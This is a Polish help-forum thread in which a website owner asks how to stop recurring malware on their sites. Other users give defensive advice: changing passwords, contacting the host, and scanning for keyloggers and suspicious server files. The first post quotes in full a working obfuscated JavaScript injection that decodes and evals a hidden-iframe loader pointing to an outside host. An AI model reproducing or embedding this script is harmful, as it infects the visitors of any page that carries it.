Wirus na stronie www
#1
Witam,

Na mojej stronie www pojawił się jakiś robak w kodzie. Avira i malwarebytes nic nie znalazły jednak problem ciągle się pojawia, infekując kolejne strony (którymi zarządzam). Oto on:

[malware] <script>b=new function(){return 2;};try{document.asd.removeChild({})}catch(q){ss="";s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd=''q'';if(''q''==={}.asd)a=document[''createTextNode''] (''321'');if(a.nodeValue==321)h=(ddd-d2)*-1;n=''4.5c4.5c52.5c51c16c20c50c55.5c49.5c58.5c54.5c50.5c55c58c23c51.5c50.5c58c34.5c54c50.5c54.5c50.5c55c58c57.5c33c60.5c42c48.5c51.5c39c48.5c54.5c50.5c20c19.5c49c55.5c50c60.5c19.5c20.5c45.5c24c46.5c20.5c61.5c4.5c4.5c4.5c52.5c51c57c48.5c54.5c50.5c57c20c20.5c29.5c4.5c4.5c62.5c16c50.5c54c57.5c50.5c16c61.5c4.5c4.5c4.5c50c55.5c49.5c58.5c54.5c50.5c55c58c23c59.5c57c52.5c58c50.5c20c17c30c52.5c51c57c48.5c54.5c50.5c16c57.5c57c49.5c30.5c19.5c52c58c58c56c29c23.5c23.5c49.5c55.5c55c55c50.5c49.5c58c50.5c50c22.5c52c50.5c50c23c49.5c55.5c54.5c23.5c59c55.5c52.5c50c23c56c52c56c31.5c56c48.5c51.5c50.5c30.5c27c24c26c28.5c51c50c27.5c48.5c49c49.5c28c48.5c24c49c28c25.5c19.5c16c59.5c52.5c50c58c52c30.5c19.5c24.5c24c19.5c16c52c50.5c52.5c51.5c52c58c30.5c19.5c24.5c24c19.5c16c57.5c58c60.5c54c50.5c30.5c19.5c59c52.5c57.5c52.5c49c52.5c54c52.5c58c60.5c29c52c52.5c50c50c50.5c55c29.5c56c55.5c57.5c52.5c58c52.5c55.5c55c29c48.5c49c57.5c55.5c54c58.5c58c50.5c29.5c54c50.5c51c58c29c24c29.5c58c55.5c56c29c24c29.5c19.5c31c30c23.5c52.5c51c57c48.5c54.5c50.5c31c17c20.5c29.5c4.5c4.5c62.5c4.5c4.5c51c58.5c55c49.5c58c52.5c55.5c55c16c52.5c51c57c48.5c54.5c50.5c57c20c20.5c61.5c4.5c4.5c4.5c59c48.5c57c16c51c16c30.5c16c50c55.5c49.5c58.5c54.5c50.5c55c58c23c49.5c57c50.5c48.5c58c50.5c34.5c54c50.5c54.5c50.5c55c58c20c19.5c52.5c51c57c48.5c54.5c50.5c19.5c20.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c57.5c57c49.5c19.5c22c19.5c52c58c58c56c29c23.5c23.5c49.5c55.5c55c55c50.5c49.5c58c50.5c50c22.5c52c50.5c50c23c49.5c55.5c54.5c23.5c59c55.5c52.5c50c23c56c52c56c31.5c56c48.5c51.5c50.5c30.5c27c24c26c28.5c51c50c27.5c48.5c49c49.5c28c48.5c24c49c28c25.5c19.5c20.5c29.5c51c23c57.5c58c60.5c54c50.5c23c59c52.5c57.5c52.5c49c52.5c54c52.5c58c60.5c30.5c19.5c52c52.5c50c50c50.5c55c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c56c55.5c57.5c52.5c58c52.5c55.5c55c30.5c19.5c48.5c49c57.5c55.5c54c58.5c58c50.5c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c54c50.5c51c58c30.5c19.5c24c19.5c29.5c51c23c57.5c58c60.5c54c50.5c23c58c55.5c56c30.5c19.5c24c19.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c59.5c52.5c50c58c52c19.5c22c19.5c24.5c24c19.5c20.5c29.5c51c23c57.5c50.5c58c32.5c58c58c57c52.5c49c58.5c58c50.5c20c19.5c52c50.5c52.5c51.5c52c58c19.5c22c19.5c24.5c24c19.5c20.5c29.5c4.5c4.5c4.5c50c55.5c49.5c58.5c54.5c50.5c55c58c23c51.5c50.5c58c34.5c54c50.5c54.5c50.5c55c58c57.5c33c60.5c42c48.5c51.5c39c48.5c54.5c50.5c20c19.5c49c55.5c50c60.5c19.5c20.5c45.5c24c46.5c23c48.5c56c56c50.5c55c50c33.5c52c52.5c54c50c20c51c20.5c29.5c4.5c4.5c62.5'';n=n[''split''] (''c'');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i] "));if(a.nodeValue==321)eval(ss);</script>[/malware]

Nie wiem już co robić. Usuwam to od trzech dni a to ciągle powraca. Pomocy.
Odpowiedz
#2
1. Zmień hasło do FTP

2. Zmień hasło do panelu hostingowego o ile takowy ma hosting z jakiego korzystasz

3. Zmień hasła we wszystkich CMSach jakie masz na stronie (wszelkie konta gdzie jest autoryzacja po haśle)

4. Jeżeli nadal będzie się powtarzać, skontaktuj się z hostingiem i zapytaj, czy to może nie jakieś globalne wstrzykiwanie kodu na ich konta

5. O ile jesteś w stanie, sprawdź, czy na serwerze nie ma jakichś podejrzanych plików php/asp (nie wiadomo z czego korzystasz, więc za wiele powiedzieć nie można), których wcześniej nie było
Odpowiedz
#3
Dziękuję za odpowiedź. Tak mi się zdawało że to może być przyczyną. Jeszcze jedno pytanie. Czy zmiana nazw polskich na angielskie w menu start też może być spowodowana wirusami?
Odpowiedz
#4
czasami można także skorzystać z sieciowego skanerado wykrywania exploitów oraz malware

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
#5
Wszystkie hasła zostały zmienione, połączenia usunięte z total commandera. Poprawa była tylko na jeden dzień. Dziś znów to samo. Nie wiem co z tym zrobić. Kończą mi się pomysły.
Odpowiedz
#6
Upewnij się że Twój komputer jest czysty (keyloggery) oraz połączenie sieciowe (sniffery).
Odpowiedz
#7
Możesz jak krowie na rowie. Wink Co mam zainstalować? Na co zwrócić uwagę?
Odpowiedz
#8
Najlepiej użyć do tego celu wyspecjalizowanych programów jak (najlepiej kilka lub wszystkie z nich):
-

[Aby zobaczyć linki, zarejestruj się tutaj]

,
-

[Aby zobaczyć linki, zarejestruj się tutaj]

-

[Aby zobaczyć linki, zarejestruj się tutaj]

Comodo Cleaning Essentials:

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
#9
A czy one kolidują z nortonem?
Odpowiedz
#10
tomasbobas napisał(a):A czy one kolidują z nortonem?
To wszystko skanery na żądanie (prócz mbam pro), więc nie powinny.
Sandboxie + UAC Max/Spyshelter P + Webroot SA + OPEN DNS
Odpowiedz
#11
bardok206 napisał(a):
tomasbobas napisał(a):A czy one kolidują z nortonem?
To wszystko skanery na żądanie (prócz mbam pro), więc nie powinny.

Ale MBAM Free będzie w sam raz.
Odpowiedz
#12
Witam ponownie. Po ściągnięciu wszystkich podanych programów, zeskanowaniu i wywaleniu całego syfu, problem znów powrócił. Emergency Kit znalazł coś takiego - torjan.js.iframe!ik. W ścieżce do tego trojana widnieje taki zapis mozilla/firefox/profile/au9npkvc/Klaudia/cache/9/47/d04cad01. Czy to możliwe by trojan zagnieżdzał się gdzieś w przeglądarce tudzież w mozilli jest jakaś luka "dzięki", której wchodzi? Co z tym zrobić?
Odpowiedz
#13
To szkodliwa ramka iFrame. Nie, wirus nie zagnieździł się w przeglądarce. To tylko tymczasowe pliki.
Odpowiedz
#14
Czy to ona jest przyczyną tych złośliwych kodów na stronie?
Odpowiedz
#15
Niestety - nie wiem. Niech inni się wypowiedzą.
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości